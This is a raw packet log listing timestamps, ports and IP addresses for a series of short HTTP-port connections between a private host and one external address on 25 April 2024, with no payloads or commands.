Apr 25, 2024 09:43:03.510343075 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.510389090 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.510447979 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:03.518138885 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.518151999 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.518239975 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:03.526103020 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.526115894 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.526266098 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:03.533791065 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.533802986 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.533870935 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:03.541615009 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.541645050 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.541711092 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:03.549263000 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.549294949 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.549348116 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:03.556799889 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.556812048 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.556855917 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:03.564291000 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.564302921 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.564348936 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:03.745532036 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:03.906039000 CEST	49801	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:04.033082008 CEST	80	49801	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:04.033277988 CEST	49801	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:04.035270929 CEST	49801	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:04.162328959 CEST	80	49801	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:04.162424088 CEST	49801	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:04.289696932 CEST	80	49801	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:04.977320910 CEST	80	49801	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:04.977344990 CEST	80	49801	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:04.977415085 CEST	49801	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:04.977415085 CEST	49801	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:04.977471113 CEST	80	49801	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:04.977535009 CEST	49801	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:04.986962080 CEST	80	49801	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:04.987011909 CEST	49801	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:04.987298012 CEST	80	49801	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:04.987344980 CEST	49801	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:04.987370014 CEST	80	49801	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:04.987412930 CEST	49801	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:04.987467051 CEST	80	49801	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:04.987581015 CEST	49801	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:04.987651110 CEST	80	49801	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:04.987699032 CEST	49801	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:04.987700939 CEST	80	49801	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:04.987749100 CEST	49801	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:04.987760067 CEST	80	49801	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:04.987807989 CEST	49801	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:05.105629921 CEST	80	49801	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:05.105644941 CEST	80	49801	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:05.105690956 CEST	49801	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:05.119795084 CEST	49802	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:05.245857000 CEST	80	49802	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:05.245948076 CEST	49802	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:05.247701883 CEST	49802	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:05.373501062 CEST	80	49802	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:05.373589993 CEST	49802	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:05.499461889 CEST	80	49802	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:06.233783960 CEST	80	49802	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:06.233926058 CEST	49802	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:06.234366894 CEST	80	49802	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:06.234379053 CEST	80	49802	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:06.234440088 CEST	49802	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:06.234481096 CEST	49802	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:06.244445086 CEST	80	49802	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:06.244513988 CEST	49802	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:06.244833946 CEST	80	49802	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:06.244884014 CEST	49802	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:06.244973898 CEST	80	49802	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:06.245026112 CEST	49802	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:06.245279074 CEST	80	49802	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:06.245290995 CEST	80	49802	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:06.245327950 CEST	49802	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:06.245495081 CEST	80	49802	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:06.245506048 CEST	80	49802	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:06.245538950 CEST	49802	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:06.245568991 CEST	49802	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:06.360012054 CEST	80	49802	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:06.360064983 CEST	49802	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:06.360178947 CEST	80	49802	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:06.360191107 CEST	80	49802	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:06.360222101 CEST	49802	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:06.360249996 CEST	49802	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:06.370048046 CEST	49803	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:06.497284889 CEST	80	49803	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:06.497452021 CEST	49803	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:06.504867077 CEST	49803	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:06.631882906 CEST	80	49803	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:06.632006884 CEST	49803	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:06.759109020 CEST	80	49803	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:07.502393961 CEST	80	49803	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:07.502492905 CEST	80	49803	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:07.502593994 CEST	49803	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:07.502635956 CEST	49803	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:07.511431932 CEST	80	49803	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:07.511495113 CEST	49803	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:07.511869907 CEST	80	49803	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:07.511914968 CEST	49803	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:07.511919975 CEST	80	49803	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:07.511962891 CEST	49803	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:07.512092113 CEST	80	49803	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:07.512135029 CEST	49803	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:07.512553930 CEST	80	49803	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:07.512587070 CEST	80	49803	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:07.512625933 CEST	80	49803	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:07.512626886 CEST	49803	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:07.512640953 CEST	49803	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:07.512666941 CEST	49803	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:07.512667894 CEST	80	49803	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:07.512710094 CEST	49803	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:07.629829884 CEST	80	49803	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:07.629878998 CEST	49803	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:07.630026102 CEST	80	49803	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:07.630064011 CEST	49803	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:07.647798061 CEST	49804	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:07.778850079 CEST	80	49804	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:07.778959036 CEST	49804	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:07.780738115 CEST	49804	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:07.911940098 CEST	80	49804	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:07.911998987 CEST	49804	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:08.042982101 CEST	80	49804	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:08.720006943 CEST	80	49804	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:08.720118046 CEST	80	49804	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:08.720148087 CEST	49804	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:08.720231056 CEST	49804	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:08.720381975 CEST	80	49804	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:08.720432997 CEST	49804	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:08.729425907 CEST	80	49804	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:08.729490042 CEST	49804	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:08.729669094 CEST	80	49804	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:08.729736090 CEST	49804	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:08.729809999 CEST	80	49804	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:08.729852915 CEST	49804	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:08.729911089 CEST	80	49804	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:08.729954958 CEST	49804	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:08.730053902 CEST	80	49804	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:08.730076075 CEST	80	49804	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:08.730098009 CEST	49804	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:08.730128050 CEST	49804	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:08.730185986 CEST	80	49804	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:08.730226994 CEST	49804	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:08.851440907 CEST	80	49804	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:08.851458073 CEST	80	49804	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:08.851500034 CEST	49804	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:08.851538897 CEST	49804	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:08.851577997 CEST	80	49804	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:08.851625919 CEST	49804	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:08.866470098 CEST	49805	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:08.997127056 CEST	80	49805	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:08.997328997 CEST	49805	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:08.999268055 CEST	49805	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:09.130011082 CEST	80	49805	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:09.130069971 CEST	49805	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:09.261404037 CEST	80	49805	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:09.948549986 CEST	80	49805	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:09.948570967 CEST	80	49805	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:09.948630095 CEST	49805	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:09.948667049 CEST	80	49805	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:09.948800087 CEST	49805	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:09.948800087 CEST	49805	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:09.956132889 CEST	80	49805	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:09.956212044 CEST	49805	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:09.956583023 CEST	80	49805	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:09.956628084 CEST	49805	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:09.956681013 CEST	80	49805	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:09.956727982 CEST	49805	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:09.956821918 CEST	80	49805	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:09.956861973 CEST	49805	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:09.957000971 CEST	80	49805	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:09.957041025 CEST	49805	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:09.957041025 CEST	80	49805	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:09.957087994 CEST	49805	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:09.957190990 CEST	80	49805	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:09.957230091 CEST	49805	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:10.079396963 CEST	80	49805	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:10.079412937 CEST	80	49805	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:10.079454899 CEST	49805	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:10.096410990 CEST	49806	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:10.229568005 CEST	80	49806	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:10.229636908 CEST	49806	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:10.231972933 CEST	49806	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:10.365127087 CEST	80	49806	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:10.365226984 CEST	49806	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:10.498204947 CEST	80	49806	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:11.193577051 CEST	80	49806	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:11.193600893 CEST	80	49806	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:11.193761110 CEST	49806	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:11.193809986 CEST	49806	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:11.193995953 CEST	80	49806	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:11.194008112 CEST	80	49806	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:11.194017887 CEST	80	49806	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:11.194051981 CEST	49806	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:11.194083929 CEST	49806	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:11.194984913 CEST	49806	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:11.202768087 CEST	80	49806	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:11.202816963 CEST	49806	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:11.203032017 CEST	80	49806	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:11.203074932 CEST	49806	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:11.203130960 CEST	80	49806	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:11.203170061 CEST	49806	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:11.203207970 CEST	80	49806	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:11.203255892 CEST	49806	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:11.203522921 CEST	80	49806	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:11.203562021 CEST	49806	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:11.326858997 CEST	80	49806	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:11.326874971 CEST	80	49806	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:11.326910019 CEST	49806	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:11.326927900 CEST	49806	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:11.336447954 CEST	49807	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:11.467128992 CEST	80	49807	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:11.467277050 CEST	49807	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:11.469230890 CEST	49807	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:11.599853992 CEST	80	49807	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:11.599955082 CEST	49807	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:11.735290051 CEST	80	49807	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:12.406363964 CEST	80	49807	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:12.406382084 CEST	80	49807	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:12.406517029 CEST	49807	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:12.406517982 CEST	49807	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:12.412800074 CEST	80	49807	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:12.412900925 CEST	49807	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:12.413032055 CEST	80	49807	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:12.413078070 CEST	49807	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:12.413162947 CEST	80	49807	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:12.413206100 CEST	49807	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:12.413599968 CEST	80	49807	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:12.413644075 CEST	49807	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:12.413742065 CEST	80	49807	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:12.413783073 CEST	49807	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:12.413813114 CEST	80	49807	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:12.413831949 CEST	80	49807	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:12.413845062 CEST	80	49807	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:12.413852930 CEST	49807	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:12.413883924 CEST	49807	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:12.413883924 CEST	49807	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:12.537399054 CEST	80	49807	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:12.537420034 CEST	80	49807	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:12.537528038 CEST	49807	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:12.546787977 CEST	49808	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:12.678885937 CEST	80	49808	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:12.679039955 CEST	49808	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:12.681066036 CEST	49808	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:12.811773062 CEST	80	49808	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:12.811932087 CEST	49808	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:12.942615986 CEST	80	49808	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:13.659035921 CEST	80	49808	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:13.659121990 CEST	80	49808	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:13.659195900 CEST	80	49808	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:13.659194946 CEST	49808	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:13.659275055 CEST	49808	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:13.659276009 CEST	49808	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:13.668746948 CEST	80	49808	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:13.668795109 CEST	80	49808	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:13.668812990 CEST	49808	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:13.668843031 CEST	49808	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:13.669081926 CEST	80	49808	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:13.669120073 CEST	80	49808	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:13.669146061 CEST	49808	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:13.669171095 CEST	49808	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:13.669173002 CEST	80	49808	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:13.669190884 CEST	80	49808	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:13.669214964 CEST	49808	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:13.669229031 CEST	80	49808	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:13.669234037 CEST	49808	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:13.669276953 CEST	49808	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:13.789942980 CEST	80	49808	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:13.789959908 CEST	80	49808	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:13.790024042 CEST	49808	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:13.790024042 CEST	49808	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:13.803898096 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:13.933114052 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:13.933203936 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:13.935225964 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:14.065486908 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:14.065566063 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:14.194839954 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:14.907027006 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:14.907119036 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:14.907200098 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:14.907243967 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:14.907249928 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:14.907283068 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:14.916644096 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:14.916712046 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:14.917058945 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:14.917072058 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:14.917107105 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:14.917128086 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:14.917243958 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:14.917289972 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:14.917397022 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:14.917440891 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:14.917450905 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:14.917490005 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:14.917490005 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:14.917526007 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:15.036768913 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:15.036843061 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:15.036998034 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:15.037012100 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:15.037031889 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:15.037055969 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:15.040030003 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:15.171020985 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:15.171120882 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:15.173099041 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:15.304053068 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:15.304244995 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:15.435359955 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:16.120584965 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:16.120609045 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:16.120646000 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:16.120668888 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:16.120836973 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:16.120836973 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:16.128948927 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:16.129015923 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:16.129221916 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:16.129264116 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:16.129400969 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:16.129443884 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:16.129493952 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:16.129534006 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:16.129673004 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:16.129710913 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:16.129729033 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:16.129769087 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:16.129795074 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:16.129832029 CEST	49810	80	192.168.2.4	45.77.223.48
